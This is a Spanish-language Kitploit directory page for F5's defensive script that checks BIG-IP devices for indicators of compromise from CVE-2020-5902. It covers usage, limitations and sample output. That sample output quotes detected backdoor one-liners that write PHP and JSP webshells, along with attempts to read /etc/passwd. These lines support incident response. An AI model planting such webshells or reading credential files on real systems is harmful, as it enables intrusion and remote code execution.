Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2020-5902-ioc-bigip-checker — Script local de F5 BIG-IP que busca Indicadores de Compromiso (IoCs) relacionados con CVE-2020-5902, revisando registros, archivos e integridad del sistema para detectar actividad posterior a la explotación. | Kitploit
Herramientas/GitHubGitHub/f5devcentral/cve-2020-5902-ioc-bigip-checker
Gestión de Indicadores de Compromiso (IOC)Análisis de VulnerabilidadesAnálisis ForenseSeguridad WebRespuesta a IncidentesAnálisis de Registros
GitHubf5devcentral/cve-2020-5902-ioc-bigip-checker

cve-2020-5902-ioc-bigip-checker

Script local de F5 BIG-IP que busca Indicadores de Compromiso (IoCs) relacionados con CVE-2020-5902, revisando registros, archivos e integridad del sistema para detectar actividad posterior a la explotación.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
171213hace 6 añosAún no revisado
Compartir

CVE-2020-5902 Herramienta de Detección de IoC

Este script está diseñado para ser ejecutado localmente en un F5 BIG-IP en Advanced Shell (bash) por un usuario con privilegios de root; no está diseñado para ser ejecutado en ningún otro entorno. Nota: El modo Appliance no permite el acceso a Advanced Shell, por lo tanto, esta herramienta no se puede ejecutar en dichos sistemas.

El script examina el BIG-IP en busca de los Indicadores de Compromiso asociados con CVE-2020-5902 que F5 Networks conocía en el momento de su creación. El script recopila estos IoC y presenta un informe como resumen que puede utilizar para fundamentar su determinación del mejor camino a seguir. Si esta herramienta descubre algún IoC, debe examinarlos y confirmarlos manualmente, y luego seguir sus propios procedimientos documentados para manejar sistemas sospechosos de estar comprometidos. Puede encontrar orientación específica de F5 en K11438344: Consideraciones y orientación cuando se sospecha un compromiso de seguridad en un sistema BIG-IP.

Nota: Si tiene alguna incertidumbre o duda sobre la integridad de cualquier sistema, el enfoque cauteloso es considerar el sistema comprometido y seguir sus procedimientos internos para manejar un sistema comprometido. Tenga en cuenta también que cualquier información contenida en un sistema comprometido debe considerarse comprometida. Esto incluye, entre otros, contraseñas, claves privadas, certificados digitales, configuraciones, registros, etc.

Limitaciones y consideraciones

Debe tenerse en cuenta que los IoC pueden no estar presentes debido a la antigüedad (por ejemplo, por rotación de registros) o a la eliminación por parte de un adversario suficientemente hábil. Dado que la explotación de CVE-2020-5902 potencialmente resulta en la ejecución remota de código como usuario root, un atacante experto podría sanear el sistema de rastros después de la explotación.

Tenga en cuenta también que un atacante podría envenenar cualquier binario del sistema, incluido python. Se han tomado medidas razonables para evitar esta posibilidad; sin embargo, usted debe determinar su nivel de confianza en la salida de esta herramienta en cualquier sistema del que se sospeche que está comprometido.

En versiones de BIG-IP que incluyen sys-eicheck (13.1.0 en adelante), esta herramienta ofrece al administrador la oportunidad de verificar el sistema en ejecución contra los RPM de instalación originales para buscar modificaciones de archivos en un intento de garantizar la integridad de los comandos del sistema de los que depende esta herramienta. Tenga en cuenta que sys-eicheck se puede ejecutar en todas las plataformas independientemente de la capacidad FIPS.

En versiones anteriores, la herramienta actualmente no incluye esta funcionalidad y se ejecutará sin verificar si los binarios del sistema instalados originalmente han sido manipulados.

Verificación de la autenticidad de este script

La suma sha384 de esta versión de CVE-2020-5902_bigip_ioc_checker.py es: ce674235744b54de3331c19a402f911c4390dbbf297643ec3eed165bda49a951f48c1be9188372de3d92dd9f28595cbb

Solo debe descargar estos archivos del repositorio de GitHub de F5 DevCentral

Información sobre CVE-2020-5902

Tenga en cuenta que la fuente autorizada de información sobre CVE-2020-5902 es siempre el Aviso de seguridad de F5, K52145254: Vulnerabilidad de RCE en TMUI CVE-2020-5902

Ejecución del script

Simplemente descargue el archivo CVE-2020-5902_bigip_ioc_checker.py al BIG-IP de destino y ejecútelo usando la instalación de python ya presente en BIG-IP.

Ejemplo:

[root@hostname:Active:Standalone] tmp # python CVE-2020-5902_bigip_ioc_checker.py -h
USAGE: python CVE-2020-5902_bigip_ioc_checker.py

You can use the following options <-iajylcbwut> to skip some checks:

Option: -i or --skip_sys-eicheck
[+] Skip using the sys_eicheck utility to scan the BIG-IP system for any unexpected changes to the system software.
[+] Please refer to https://support.f5.com/csp/article/K00029945for more details about the sys-eicheck utility.
[+] The sys-eicheck utility may take several minutes to finish.

Option: -a or --skip_audit_check        [+] Skip scanning the audit log for malicious activities.
Option: -j or --skip_journal_check      [+] Skip scanning the journal log for malicious activities.
Option: -y or --skip_systems_check      [+] Skip scanning /config/bigip_user.conf to look for malicious users.
Option: -l or --skip_alias_check        [+] Skip scanning /config/bigip_*.conf for malicious alias definition.
Option: -c or --skip_catalina_check     [+] Skip scanning the tomcat catalina.out log for malicious activities.
Option: -b or --skip_bigipstartup_check [+] Skip checking if /config/startup contains blacklisted words.
Option: -w or --skip_webshell_check     [+] Skip checking Files created after 2020 Jun 29 in the /usr/local/www/ to look for possible webshell files.
Option: -u or --skip_autostart_check    [+] Skip checking Files created after 2020 Jun 29 in /etc/ to look for the possible autostart script.
Option: -t or --skip_tmp_check          [+] Skip checking Files created after 2020 Jun 29 in /tmp
Option: -p or --disable_color_print     [+] Disable color print, better for saving result
Option: -q or --bigiq_cmd_check         [+] Run BIG-IQ compatible malicious command check

Option: -h or --help                    [+] Print usage

Problemas conocidos

Si un BIG-IP está gestionado por BIG-IQ u otro sistema de automatización/gestión, puede recibir comandos bash de BIG-IQ u otro sistema de automatización/gestión. Algunos de los comandos bash tienen el script de codificación base64 incrustado. Esos comandos bash registrados en los registros de auditoría de BIG-IP podrían hacer que la Herramienta de Detección de IoC informe falsos positivos: "!! IoC pattern malicious bash command found". Para reducir los falsos positivos, puede usar la opción -q para que la Herramienta de Detección de IoC ignore el script codificado en base64 legítimo en los registros de auditoría.

La actualización del sistema puede actualizar las marcas de tiempo en los archivos en /usr/local/www/, lo que puede resultar en un falso positivo, por ejemplo, si el software corregido se instaló recientemente.

Si se devuelven resultados para cualquiera de las comprobaciones de fecha de creación de archivos en /usr/local/www/, /etc/ y /tmp/, los archivos deben examinarse para determinar su legitimidad.

Es posible encontrar Indicadores de Compromiso en los registros de journalctl después de una actualización a una versión corregida o después de aplicar la solución alternativa. Revise la marca de tiempo de los registros si están presentes y verifique que ocurrieron antes de la actualización o de la aplicación de la solución alternativa.

Ejemplo de salida

# python CVE-2020-5902_bigip_ioc_checker.py -iqa
>>>> Skip sys-eicheck check
>>>> Run BIG-IQ compatible malicious command check
>>>> Skip audit log check
CVE-2020-5902 Indicators of Compromise checker. False positive reports are possible and all results should be manually verified.
[+] Version 13.1.0 Build 0.0.1868 CVE-2020-5902 Fixed: False
!! IoC pattern ['/etc/fakefile', '/etc/passwd', '/etc/fakefile1'] access denied in file /var/log/tomcat/catalina.out
!! IoC pattern ['/config/bigip_base.conf'] access denied in file /var/log/tomcat/catalina.out.1
!! IoC pattern Possible backdoor echo "<?php eval(\$_REQUEST[09ede7]);" > /usr/local/www/xui/common/css/webshell.php in file /config/startup
!! IoC pattern Possible backdoor echo "Runtime.getRuntime().exec("cmd.exe /C " + cmd);" > /usr/local/www/xui/common/css/webshell.jsp in file /config/startup
Descargar herramienta